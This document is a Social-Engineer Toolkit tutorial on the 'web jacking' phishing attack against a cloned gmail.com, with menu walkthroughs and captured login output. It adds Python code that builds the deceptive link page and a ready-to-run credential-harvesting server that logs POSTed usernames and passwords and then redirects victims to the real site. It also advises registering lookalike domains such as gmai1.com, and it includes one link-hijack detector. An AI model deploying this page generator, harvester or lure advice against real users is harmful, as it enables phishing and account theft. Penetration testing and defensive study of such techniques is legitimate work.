Web Jacking Attack Method
The web jacking attack method creates a clone of a website and presents the victim with a page stating that the site has moved, along with a link to follow. This feature is new in SET version 0.7. When the victim hovers over the link, the browser's status bar shows the real URL, not the attacker's machine: if you are cloning gmail.com, the hovered link displays gmail.com. When the victim clicks the moved link, gmail opens and is then quickly replaced with your malicious web server hosting the clone. Remember, you can change the timing of the web jacking swap in the config/set_config flags.
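As an added example (not SET's own template or code), here is a Python reconstruction of the two halves of the trick: a landing page whose link shows the legitimate URL on hover but cancels that navigation and sends the browser to the clone after a delay, and a check that flags such links by comparing each anchor's href against the target its click handler navigates to. The handler text, the index2.html clone path (matching the access log later on this page) and the 2000 ms default delay are assumptions.

```python
# Added example, not SET's own template or code. Reconstructs the web jacking
# link trick and a check that detects it. Assumed: handler text, the clone
# path "index2.html" and the 2000 ms default delay.
from html.parser import HTMLParser
from urllib.parse import urlparse
import html
import re


def build_landing_page(real_url, clone_path="index2.html", delay_ms=2000):
    """Return the 'site has moved' page served at / on the attacker's host.

    The anchor's href is the legitimate URL, so hovering shows e.g. gmail.com
    in the status bar. The click handler cancels that navigation (return false)
    and, after delay_ms, sends the browser to the attacker-hosted clone instead.
    """
    safe_real = html.escape(real_url, quote=True)
    safe_clone = html.escape(clone_path, quote=True)
    handler = (
        f"setTimeout(function(){{window.location='{safe_clone}'}}, "
        f"{int(delay_ms)}); return false;"
    )
    return (
        "<html><body>\n"
        f'<p>The site has moved. Please click <a href="{safe_real}" '
        f'onclick="{handler}">here</a>.</p>\n'
        "</body></html>\n"
    )


class _AnchorCollector(HTMLParser):
    """Collect (href, onclick) for every <a> tag in a document."""

    def __init__(self):
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            attr = dict(attrs)
            self.anchors.append((attr.get("href") or "", attr.get("onclick") or ""))


# Matches window.location = '...', location.href = "..." and similar assignments.
_NAV_RE = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


def find_hijacked_links(page_html):
    """Flag anchors whose click handler navigates somewhere other than href.

    A visible href on one host and a script handler that sends the browser to
    another target is the signature of this attack. Returns a list of
    {"href": ..., "actual_target": ...} dicts, empty when nothing is suspicious.
    Only plain location assignments are recognised; this is a starting point,
    not a complete JavaScript analysis.
    """
    collector = _AnchorCollector()
    collector.feed(page_html)
    findings = []
    for href, onclick in collector.anchors:
        match = _NAV_RE.search(onclick)
        if match is None:
            continue
        target = match.group(1)
        if urlparse(target).netloc != urlparse(href).netloc:
            findings.append({"href": href, "actual_target": target})
    return findings


if __name__ == "__main__":
    page = build_landing_page("https://gmail.com")
    print(page)
    print(find_hijacked_links(page))
```

Run the module directly to print the generated page and the finding it produces against itself; the same check can be pointed at any saved HTML when reviewing a suspected lure.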
 1. The Java Applet Attack Method
 2. The Metasploit Browser Exploit Method
 3. Credential Harvester Attack Method
 4. Tabnabbing Attack Method
 5. Man Left in the Middle Attack Method
 6. Web Jacking Attack Method
 7. Multi-Attack Web Method
 8. Return to the previous menu

Enter your choice (press enter for default): 6

The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

 1. Web Templates
 2. Site Cloner
 3. Custom Import
 4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message.
[*] Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
When the victim opens the site, they see the "moved" link shown below. Notice the URL in the bottom left of the browser (the status bar): it reads gmail.com.
When the victim clicks the link, they are presented with the following web page:
Look at the URL bar: we are now on our malicious web server. With social engineering you want the lure to be believable, so using a bare IP address is generally a bad idea. My recommendation for a penetration test is to register a name similar to the target's; for gmail you could use gmai1.com (note the 1 in place of the l), or something similar that could mislead the user into thinking it is the legitimate site. Most of the time the victim won't even notice an IP address, but a lookalike domain is one more way to make sure the attack goes through without a hitch; registering one is part of the engagement, so keep it inside the agreed scope. Once the victim enters a username and password in the form fields, you will see the credentials intercepted in the harvester output.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 -
172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7017428156907423605
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=0JsVTaj70sk
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
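The harvester output above prints every POST parameter and calls out the fields that look like a username and a password. As an added example (not SET's code), the following Python mirrors that behaviour: it parses a form body in wire order, tags likely credential fields by parameter name, renders the hit the way the harvester prints it, and runs a minimal server that logs the hit and then redirects the victim onward. The field-name hints and the post-capture redirect destination are assumptions.

```python
# Added example, not SET's code. Mirrors what the harvester output on this
# page shows: every POST parameter printed, likely credential fields called
# out. Assumed: the field-name hints and the post-capture redirect target.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl

# Assumed name fragments that mark a field as a username or a password.
USERNAME_HINTS = ("user", "email", "login", "account", "uid")
PASSWORD_HINTS = ("pass", "pwd", "secret")


def classify_post(body):
    """Parse a form-urlencoded body and tag the likely credential fields.

    Returns {"params": [(name, value), ...] in wire order with duplicates kept,
             "username": (name, value) or None,
             "password": (name, value) or None}.
    A field matches at most one class and password hints are checked first;
    the first match of each class wins, as a login form carries one of each.
    """
    params = parse_qsl(body, keep_blank_values=True)
    username = password = None
    for name, value in params:
        lowered = name.lower()
        if password is None and any(h in lowered for h in PASSWORD_HINTS):
            password = (name, value)
        elif username is None and any(h in lowered for h in USERNAME_HINTS):
            username = (name, value)
    return {"params": params, "username": username, "password": password}


def format_hit(result):
    """Render a classified POST the way the harvester prints a hit."""
    lines = []
    for name, value in result["params"]:
        if result["username"] == (name, value):
            lines.append(f"POSSIBLE USERNAME FIELD FOUND: {name}={value}")
        elif result["password"] == (name, value):
            lines.append(f"POSSIBLE PASSWORD FIELD FOUND: {name}={value}")
        else:
            lines.append(f"PARAM: {name}={value}")
    return lines


class HarvesterHandler(BaseHTTPRequestHandler):
    """Serve the clone's form target: log the POST, then redirect the victim."""

    # Assumed: where to send the victim after capture, so the attempt looks
    # like a login page that simply reloaded on the genuine site.
    redirect_to = "https://mail.google.com/"

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        print("[*] WE GOT A HIT! Printing the output:")
        for line in format_hit(classify_post(body)):
            print(line)
        self.send_response(302)
        self.send_header("Location", self.redirect_to)
        self.end_headers()


def serve(port=80):
    """Listen on all interfaces, as the harvester does on port 80."""
    HTTPServer(("0.0.0.0", port), HarvesterHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Because classification is purely name-based, any form whose fields are named differently (a single "credentials" blob, or obfuscated names) is still captured in full but not called out; the harvester's "captures all POSTs" line reflects the same design.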
